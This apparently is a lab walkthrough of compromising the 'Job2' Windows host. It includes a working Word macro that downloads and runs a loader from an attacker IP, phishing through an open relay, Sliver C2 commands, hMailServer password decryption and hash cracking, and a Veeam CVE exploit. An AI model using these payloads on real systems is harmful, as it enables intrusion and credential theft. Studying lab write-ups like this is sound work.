Job2

Machine information

Operating System: Windows 2016

Chain: False (standalone compromise)

Credentials

Username                  Password        Method                            Scope
------------------------  --------------  --------------------------------  ------------------------
Mailserver Administrator  MailAdm1n2023   creds.txt on Julian's Desktop     hMailServer
-                         95C02068FD5D    Decrypted from hMailServer.INI    Database for hMailServer
Ferdinand                 Franzi123!      Extracted from Database           Local User

✅ Valid Usernames

Ferdinand

🔑 Passwords list

MailAdm1n2023
95C02068FD5D
Franzi123!

Information Gathering

22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
25/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
80/tcp   open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp  open  rpcbind       syn-ack ttl 127
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp  open  microsoft-ds? syn-ack ttl 127
1063/tcp open  rpcbind       syn-ack ttl 127
2049/tcp open  rpcbind       syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Service enumeration

SMTP

The server is an open relay: it accepts MAIL FROM / RCPT TO pairs for domains it is not responsible for, without any authentication, so anyone can send mail through it, including mail that appears to come from an external address and is addressed to internal mailboxes such as hr@job2.vl.

❯ nmap -p25 -Pn --script smtp-open-relay 10.10.95.231
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 15:34 EDT
Nmap scan report for 10.10.95.231
Host is up (0.16s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)

HTTPS (www.job2.vl)

Possible Attack Path: the careers page reads "If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document. We look forward to hearing from you!" Combined with the open relay, this invites a macro-enabled Word document mailed to hr@job2.vl from any sender address.

Initial Access

The tester set up a Sliver server and generated an HTTP beacon, http-vulnlabs-4444.exe, which was used throughout the assessment.

Setting up the Word macro

Windows Defender was found running on the host and blocking the stock beacon, so the tester followed the approach in Bypass AV/EDR via DInvoke + Sliver: the macro only downloads and launches a DInvoke-based Loader.exe, which in turn stages the Sliver beacon and returns the shell. The document is saved in the legacy .doc format so that the AutoOpen macro runs when it is opened, and C:\Windows\system32\spool\drivers\color is used as the drop path because it is writable by standard users.

' SW_HIDE = 0 runs the loader without a visible window. (Without Option Explicit
' an undeclared name such as SHOW_HIDE also evaluates to 0, but only by accident.)
Private Const SW_HIDE As Long = 0

' LongPtr for the pointer-sized arguments keeps the declarations valid on 64-bit Office.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As LongPtr, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As LongPtr) As Long

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    Dim dest As String
    dest = "C:\Windows\system32\spool\drivers\color\Loader.exe"
    ' Fetch Loader.exe from the attacker's web server; URLDownloadToFileA returns 0 (S_OK) on success.
    If URLDownloadToFileA(0, "http://10.8.5.48/Loader.exe", dest, 0, 0) = 0 Then
        WinExec dest, SW_HIDE
    End If
End Sub

Sending the malicious document with the sendemail tool (the relay accepts the external gmail.com sender without AUTH, as the 250 replies below show)

❯ sendemail -t hr@job2.vl -f john.smith@gmail.com -a pay.doc -u "Subject: Appliction Resume" -s 10.10.89.165 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

May 06 18:25:35 kali sendemail[185144]: Message input complete.
May 06 18:25:35 kali sendemail[185144]: DEBUG => Connecting to 10.10.89.165:25
May 06 18:25:35 kali sendemail[185144]: DEBUG => My IP address is: 10.8.5.48
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	220 JOB2 ESMTP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	EHLO kali
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	250-JOB2, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	MAIL FROM:<john.smith@gmail.com>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	RCPT TO:<hr@job2.vl>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: 	DATA
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 	354 OK, send.
May 06 18:25:36 kali sendemail[185144]: INFO => Sending message body
May 06 18:25:36 kali sendemail[185144]: Setting content-type: text/plain
May 06 18:25:36 kali sendemail[185144]: DEBUG => Sending the attachment [pay.doc]
May 06 18:25:38 kali sendemail[185144]: SUCCESS => Received: 	250 Queued (1.484 seconds)
May 06 18:25:38 kali sendemail[185144]: Email was sent successfully!  From: <john.smith@gmail.com> To: <hr@job2.vl> Subject: [Subject: Appliction Resume] Attachment(s): [pay.doc] Server: [10.10.89.165:25]
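The open-relay finding and the sendemail delivery above, as an added example that is not part of the original writeup nor of nmap or sendemail: the probe reproduces the core of what the smtp-open-relay script tests (an unauthenticated transaction from a foreign sender to a foreign recipient), and the sender rebuilds the sendemail command with smtplib. A small in-process SMTP stand-in with a relay on/off switch is included so the block runs offline; the stand-in, the example.com recipient and the attachment bytes are constructed for the example and are not the target.

```python
"""Open-relay probe and maldoc delivery over SMTP (added example)."""
import smtplib
import socketserver
import threading
from email.message import EmailMessage


def probe_open_relay(host, port, external_from, external_rcpt, timeout=10):
    """True if the server accepts RCPT TO at a foreign domain from an
    unauthenticated foreign sender. A properly configured MTA answers 5xx."""
    with smtplib.SMTP(host, port, local_hostname="kali", timeout=timeout) as smtp:
        code, _ = smtp.mail(external_from)      # smtplib sends EHLO first
        if code != 250:
            return False
        code, _ = smtp.rcpt(external_rcpt)
        smtp.rset()                             # abort the transaction cleanly
        return code == 250


def build_phish(sender, recipient, subject, attachment_name, attachment_bytes):
    """Plain-text body plus a Word attachment, as sendemail -a builds it."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content("Please find my CV attached.")
    msg.add_attachment(attachment_bytes, maintype="application",
                       subtype="msword", filename=attachment_name)
    return msg


def send_via_relay(host, port, msg):
    """Deliver through the relay; no credentials are ever presented."""
    with smtplib.SMTP(host, port, local_hostname="kali", timeout=10) as smtp:
        smtp.send_message(msg)


class _Handler(socketserver.StreamRequestHandler):
    """Minimal ESMTP responder (constructed stand-in): relays for anyone when
    open_relay is set, otherwise only accepts recipients in its own domain."""

    def reply(self, line):
        self.wfile.write(line + b"\r\n")

    def handle(self):
        srv, body, in_data = self.server, [], False
        self.reply(b"220 JOB2 ESMTP")
        while True:
            line = self.rfile.readline()
            if not line:
                break
            if in_data:                          # collecting the message body
                if line.rstrip(b"\r\n") == b".":
                    srv.messages.append(b"".join(body))
                    body, in_data = [], False
                    self.reply(b"250 Queued")
                else:
                    body.append(line)
                continue
            verb = line.strip().upper()
            if verb.startswith((b"EHLO", b"HELO")):
                self.reply(b"250 JOB2")
            elif verb.startswith(b"MAIL FROM"):
                self.reply(b"250 OK")
            elif verb.startswith(b"RCPT TO"):
                rcpt = line.split(b":", 1)[1].strip().strip(b"<>").lower()
                if srv.open_relay or rcpt.endswith(b"@" + srv.local_domain):
                    self.reply(b"250 OK")
                else:
                    self.reply(b"550 Relaying denied")
            elif verb.startswith(b"DATA"):
                in_data = True
                self.reply(b"354 OK, send.")
            elif verb.startswith(b"QUIT"):
                self.reply(b"221 Bye")
                break
            else:
                self.reply(b"250 OK")


class FakeSMTPServer(socketserver.ThreadingTCPServer):
    """Constructed local stand-in for the target's port 25."""
    allow_reuse_address = True

    def __init__(self, open_relay, local_domain=b"job2.vl"):
        super().__init__(("127.0.0.1", 0), _Handler)
        self.open_relay, self.local_domain, self.messages = open_relay, local_domain, []
        threading.Thread(target=self.serve_forever, daemon=True).start()


if __name__ == "__main__":
    relay = FakeSMTPServer(open_relay=True)
    host, port = relay.server_address
    print("open relay:", probe_open_relay(host, port, "john.smith@gmail.com", "victim@example.com"))
    doc = b"\xd0\xcf\x11\xe0" + b"\x00" * 28       # constructed OLE header, not a real maldoc
    send_via_relay(host, port, build_phish("john.smith@gmail.com", "hr@job2.vl",
                                           "Application Resume", "pay.doc", doc))
    print("messages queued by relay:", len(relay.messages))
```

The probe deliberately checks only one of the sixteen sender/recipient combinations nmap tries; the foreign-to-foreign case is the one that proves arbitrary relaying, and the foreign-to-local case (what the phish needs) is accepted by many non-relays too, so the two should be read separately.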

Lateral movement to Ferdinand

Performing situational awareness

sliver (http-vulnlabs-4444) > sa-whoami 

[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:

UserName		SID
====================== ====================================
JOB2\Julian	S-1-5-21-3935782767-3829597994-1046841959-1000


GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
JOB2\None                                         Group                    S-1-5-21-3935782767-3829597994-1046841959-513 Mandatory group, Enabled by default, Enabled group, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
BUILTIN\Remote Desktop Users                      Alias                    S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group, 
BUILTIN\Users                                     Alias                    S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\INTERACTIVE                          Well-known group         S-1-5-4                                       Mandatory group, Enabled by default, Enabled group, 
CONSOLE LOGON                                     Well-known group         S-1-2-1                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\This Organization                    Well-known group         S-1-5-15                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Local account                        Well-known group         S-1-5-113                                     Mandatory group, Enabled by default, Enabled group, 
LOCAL                                             Well-known group         S-1-2-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\NTLM Authentication                  Well-known group         S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\Medium Mandatory Level            Label                    S-1-16-8192                                   Mandatory group, Enabled by default, Enabled group, 


Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled                       
SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled                      


sliver (http-vulnlabs-4444) >  

Enumerating the security solutions (Defender real-time and behaviour monitoring are on, which is why the DInvoke loader was needed)

sliver (http-vulnlabs-4444) > execute -o cmd "/c powershell Get-MPComputerStatus | findstr True"

[*] Output:
AMServiceEnabled                 : True
AntispywareEnabled               : True
AntivirusEnabled                 : True
BehaviorMonitorEnabled           : True
IoavProtectionEnabled            : True
IsVirtualMachine                 : True
NISEnabled                       : True
OnAccessProtectionEnabled        : True
QuickScanOverdue                 : True
RealTimeProtectionEnabled        : True

sliver (http-vulnlabs-4444) >  

Discovering unusual installed software in C:\Program Files (x86)

sliver (http-vulnlabs-4444) > ls

C:\Progra~2 (25 items, 174 B)
=============================
drwxrwxrwx  AWS SDK for .NET                      <dir>  Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx  AWS Tools                             <dir>  Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx  Common Files                          <dir>  Wed May 03 18:47:14 +0000 2023
-rw-rw-rw-  desktop.ini                           174 B  Sat May 08 08:18:31 +0000 2021
drwxrwxrwx  hMailServer                           <dir>  Wed May 03 13:48:57 +0000 2023
drwxrwxrwx  Internet Explorer                     <dir>  Wed Dec 15 04:19:46 +0000 2021
drwxrwxrwx  LINQPad5                              <dir>  Wed May 03 14:05:02 +0000 2023
drwxrwxrwx  Microsoft                             <dir>  Thu Aug 19 06:41:12 +0000 2021
drwxrwxrwx  Microsoft Office                      <dir>  Wed May 03 15:15:38 +0000 2023
drwxrwxrwx  Microsoft OneDrive                    <dir>  Tue May 02 21:20:00 +0000 2023
drwxrwxrwx  Microsoft SQL Server                  <dir>  Wed May 03 18:15:45 +0000 2023
drwxrwxrwx  Microsoft SQL Server Compact Edition  <dir>  Wed May 03 14:08:26 +0000 2023
drwxrwxrwx  Microsoft Synchronization Services    <dir>  Wed May 03 13:49:01 +0000 2023
drwxrwxrwx  Microsoft Visual Studio 14.0          <dir>  Wed May 03 18:11:58 +0000 2023
drwxrwxrwx  Microsoft.NET                         <dir>  Wed May 03 18:15:54 +0000 2023
drwxrwxrwx  MSBuild                               <dir>  Wed May 03 13:43:58 +0000 2023
drwxrwxrwx  Reference Assemblies                  <dir>  Wed May 03 13:43:58 +0000 2023
drwxrwxrwx  Veeam                                 <dir>  Wed May 03 18:47:42 +0000 2023
drwxrwxrwx  Windows Defender                      <dir>  Sat May 08 09:35:34 +0000 2021
drwxrwxrwx  Windows Mail                          <dir>  Wed Mar 15 06:46:55 +0000 2023
drwxrwxrwx  Windows Media Player                  <dir>  Wed Jul 13 08:03:39 +0000 2022
drwxrwxrwx  Windows NT                            <dir>  Sat May 08 09:35:34 +0000 2021
drwxrwxrwx  Windows Photo Viewer                  <dir>  Thu Feb 10 00:28:44 +0000 2022
drwxrwxrwx  Windows Sidebar                       <dir>  Sat May 08 08:34:49 +0000 2021
drwxrwxrwx  WindowsPowerShell                     <dir>  Sat May 08 08:34:49 +0000 2021


sliver (http-vulnlabs-4444) >  
  • LINQPad 5 is a .NET scratchpad that can query SQL databases and run C# snippets without a full IDE; on a mail server it is a hint that someone works with the hMailServer database directly.

  • hMailServer is a free, open-source e-mail server for Windows. It keeps its configuration, including the database password, in hMailServer.INI and, in the default setup, its data in a local SQL Server Compact (.sdf) database.

  • Veeam Backup & Replication is Veeam's backup and disaster-recovery product for virtual, physical and cloud workloads; its backup service runs as SYSTEM, which makes an unpatched install a privilege-escalation target.

Discovering credentials on Julian's Desktop

sliver (http-vulnlabs-4444) > ls

C:\Users\Julian\Desktop (3 items, 2.8 KiB)
==========================================
-r--r--r--  creds.txt      39 B     Wed May 03 15:38:10 +0000 2023
-rw-rw-rw-  desktop.ini    282 B    Wed May 03 16:28:26 +0000 2023
-rw-rw-rw-  Word 2016.lnk  2.5 KiB  Thu May 04 10:43:29 +0000 2023


sliver (http-vulnlabs-4444) > cat creds.txt

Mailserver Administrator: MailAdm1n2023

Credentials found: Mailserver Administrator: MailAdm1n2023

Obtaining the hMailServer configuration file

hMailServer.INI lives in the Bin directory of the install (C:\Program Files (x86)\hMailServer\Bin). It stores the administrator password as an unsalted MD5 hash and the database password in reversible form.

sliver (http-vulnlabs-4444) > cat hMailServer.INI

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Username=
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

sliver (http-vulnlabs-4444) >  

Encrypted database password found: 4e9989caf04eaa5ef87fd1f853f08b62. Although the notes treat it as a hash, PasswordEncryption=1 means hMailServer encrypted it with Blowfish under a key that ships with the product, so the plaintext is fully recoverable.

Downloading the database file from the DatabaseFolder given in the INI (C:\Program Files (x86)\hMailServer\Database)

sliver (http-vulnlabs-4444) > download hMailServer.sdf

[*] Wrote 675840 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/hMailServer.sdf

Decrypting the database password. The hmailserver_password tool was uploaded to C:\Temp and run on the target; the decryption needs nothing from the host, so it could equally be done offline on the attacker machine and avoid dropping another binary under Defender.

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/hmailserver_password.exe

[*] Wrote file to C:\Temp\hmailserver_password.exe

sliver (http-vulnlabs-4444) > execute -o hmailserver_password.exe dec 4e9989caf04eaa5ef87fd1f853f08b62

[*] Output:
95C02068FD5D

sliver (http-vulnlabs-4444) >  

Password: 95C02068FD5D

Extracting user hashes from the database

hMailServer.sdf is a SQL Server Compact database protected with the password just recovered; opened with a SQL CE client, its hm_accounts table exposes the per-account hashes in the accountpassword column.

Bruteforcing and obtaining Ferdinand's password

❯ hashid 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
Analyzing '04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11'
[+] hMailServer 


❯ hashcat -m 1421 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11 /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11:Franzi123!

Ferdinand@job2.vl: Franzi123!
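The hMailServer account hash format, as an added example that is not part of the original writeup nor hMailServer's own code: the stored value is a 6-character hex salt followed by hex(SHA-256(salt || password)), which is what hashcat mode 1421 cracks. The block identifies the format (what hashid keys on), verifies a candidate against Ferdinand's hash from the page, and runs a wordlist through it; the wordlist and the helper names are constructed for the example.

```python
"""hMailServer account hashes: salt(6 hex) + hex(sha256(salt || password)).

Added example. FERDINAND_HASH is the value recovered from hMailServer.sdf in
the writeup; WORDLIST is constructed here and is not rockyou.
"""
import hashlib
import hmac
import secrets

SALT_LEN = 6                 # hMailServer prepends a 6-char hex salt ...
HASH_LEN = SALT_LEN + 64     # ... to a 64-char SHA-256 hex digest
HASHCAT_MODE = 1421          # hashcat's "hMailServer" mode for this layout

FERDINAND_HASH = "04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11"
WORDLIST = ["123456", "password", "ferdinand", "Franzi123", "Franzi123!"]  # constructed


def is_hmail_hash(value):
    """Length and alphabet check, the same cues hashid uses for this format."""
    return len(value) == HASH_LEN and all(c in "0123456789abcdef" for c in value.lower())


def hmail_hash(password, salt):
    """Stored form of 'password' under a given salt: the salt is hashed as
    its six ASCII characters, not as three raw bytes."""
    if len(salt) != SALT_LEN:
        raise ValueError("hMailServer salts are 6 hex characters")
    digest = hashlib.sha256((salt + password).encode("utf-8")).hexdigest()
    return salt + digest


def hmail_new_hash(password):
    """Stored form with a fresh random salt, as the server would generate."""
    return hmail_hash(password, secrets.token_hex(3))


def hmail_verify(stored, candidate):
    """Re-hash the candidate with the salt embedded in 'stored' and compare."""
    if not is_hmail_hash(stored):
        raise ValueError("not an hMailServer hash")
    stored = stored.lower()
    return hmac.compare_digest(hmail_hash(candidate, stored[:SALT_LEN]), stored)


def crack(stored, wordlist):
    """Dictionary attack: the salt is public and there is no key stretching,
    so every guess costs exactly one SHA-256, which is why rockyou finishes fast."""
    for word in wordlist:
        if hmail_verify(stored, word):
            return word
    return None


if __name__ == "__main__":
    print(f"hashcat -m {HASHCAT_MODE} equivalent: {crack(FERDINAND_HASH, WORDLIST)}")
```

The salt defeats precomputed tables but nothing else; a single unstretched SHA-256 per guess is what lets a full rockyou run complete in seconds on a laptop.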

Privilege Escalation to NT AUTHORITY\SYSTEM

Lateral movement to Ferdinand user

make-token calls LogonUser with the supplied credentials. A LOGON_NETWORK logon validates them against the local SAM and returns an impersonation token, so the beacon's own logon session (Logon ID) stays Julian while the thread's current token is Ferdinand; a successful make-token is therefore also confirmation that the cracked password is valid for the local account.

sliver (http-vulnlabs-4444) > make-token --username Ferdinand -p 'Franzi123!' -T LOGON_NETWORK


[*] Successfully impersonated \Ferdinand. Use `rev2self` to revert to your previous token.
sliver (http-vulnlabs-4444) > whoami

Logon ID: JOB2\Julian
[*] Current Token ID: JOB2\Ferdinand
sliver (http-vulnlabs-4444) >  

Obtaining the vulnerable Veeam version

Exploit: CVE-2023-27532. In affected builds of Veeam Backup & Replication the Veeam.Backup.Service listener on TCP 9401 accepts requests without authentication; the fix shipped in 12 P20230223 and 11a P20230227, so the 10.0.1.4854 build found here is well inside the vulnerable range.

sliver (http-vulnlabs-4444) > execute -o cmd '/c powershell Get-Package | findstr Veeam' 

[*] Output:
Veeam Backup & Replication     10.0.1.4854

Uploading the exploit and its dependencies. The three Veeam.Backup.*.dll files are Veeam's own assemblies that the PoC references; they must sit next to VeeamHax.exe.

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/VeeamHax.exe

[*] Wrote file to C:\Temp\VeeamHax.exe

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Interaction.MountService.dll

[*] Wrote file to C:\Temp\Veeam.Backup.Interaction.MountService.dll

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Model.dll

[*] Wrote file to C:\Temp\Veeam.Backup.Model.dll

sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Common.dll

[*] Wrote file to C:\Temp\Veeam.Backup.Common.dll

Exploiting the vulnerability to obtain a shell as NT AUTHORITY\SYSTEM. The command handed to VeeamHax is the same Loader.exe the macro already dropped, so the backup service, which runs as SYSTEM, launches it and a new Sliver beacon checks in with SYSTEM privileges.

sliver (http-vulnlabs-4444) >  execute VeeamHax.exe --target 127.0.0.1 --cmd "C:\Windows\system32\spool\drivers\color\Loader.exe"
